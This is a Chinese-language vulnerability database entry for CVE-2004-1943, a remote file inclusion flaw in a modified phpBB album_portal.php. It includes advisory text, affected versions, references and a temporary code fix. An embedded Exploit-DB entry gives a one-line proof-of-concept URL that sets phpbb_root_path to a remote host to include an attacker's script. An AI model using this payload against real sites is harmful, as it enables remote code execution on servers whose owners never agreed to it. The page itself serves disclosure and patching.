CVE-2004-1943
CVSS7.5
发布时间 :2004-04-19 00:00:00
修订时间 :2016-10-17 23:03:28
NMCOE    

[原文]PHP remote file inclusion vulnerability in album_portal.php in phpBB modified by Przemo 1.8 allows remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter.


[CNNVD]PHPBB album_portal.php远程文件包含漏洞(CNNVD-200404-072)

        
        phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
        phpBB包含的album_portal.php脚本对用户提交URI参数缺少充分过滤,远程攻击者利用这个漏洞以WEB进程权限执行任意命令。
        album_portal.php脚本在处理"album_root_path"参数时缺少充分过滤,攻击者提交远程服务上的恶意文件作为这个参数的包含文件,可导致以WEB进程权限执行恶意文件中的任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0.6d
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0.6c
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:2.0.7a
cpe:/a:phpbb_group:phpbb:2.0.8a
cpe:/a:phpbb_group:phpbb:2.0_beta1
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:2.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1943
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1943
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-072
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108244738102532&w=2
(UNKNOWN)  BUGTRAQ  20040419 phpBB modified by Przemo arbitary code execution
http://www.securityfocus.com/bid/10177
(VENDOR_ADVISORY)  BID  10177
http://xforce.iss.net/xforce/xfdb/15916
(VENDOR_ADVISORY)  XF  phpbb-albumportal-file-include(15916)

- 漏洞信息

PHPBB album_portal.php远程文件包含漏洞
高危 输入验证
2004-04-19 00:00:00 2006-09-28 00:00:00
远程  
        
        phpBB是一款由PHP编写的WEB论坛应用程序,支持多种数据库系统,可使用在多种Unix和Linux操作系统下。
        phpBB包含的album_portal.php脚本对用户提交URI参数缺少充分过滤,远程攻击者利用这个漏洞以WEB进程权限执行任意命令。
        album_portal.php脚本在处理"album_root_path"参数时缺少充分过滤,攻击者提交远程服务上的恶意文件作为这个参数的包含文件,可导致以WEB进程权限执行恶意文件中的任意代码。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 更改album_portal.php文件中的:
        [code]
        $album_root_path = $phpbb_root_path . 'album_mod/';
        include($album_root_path . 'album_common.'.$phpEx);
        [/code]
        为如下代码:
        [code]
        define('IN_PHPBB', true);
        $phpbb_root_path = './';
        $album_root_path = $phpbb_root_path . 'album_mod/';
        include($phpbb_root_path . 'extension.inc');
        include($album_root_path . 'album_common.'.$phpEx);
        [/code]
        厂商补丁:
        phpBB Group
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.phpbb.com/

- 漏洞信息 (24026)

PHPBB 2.0.x album_portal.php Remote File Include Vulnerability (EDBID:24026)
php webapps
2004-04-19 Verified
0 Officerrr
N/A [点击下载]
source: http://www.securityfocus.com/bid/10177/info

It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system.

http://www.example.com/album_portal.php?phpbb_root_path=http://www.example.com/&phpEx=/../../[example.php]		

- 漏洞信息

16979
phpBB album_portal.php (Modified) phpbb_root_path Variable Arbitrary Code Injection
Remote / Network Access

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站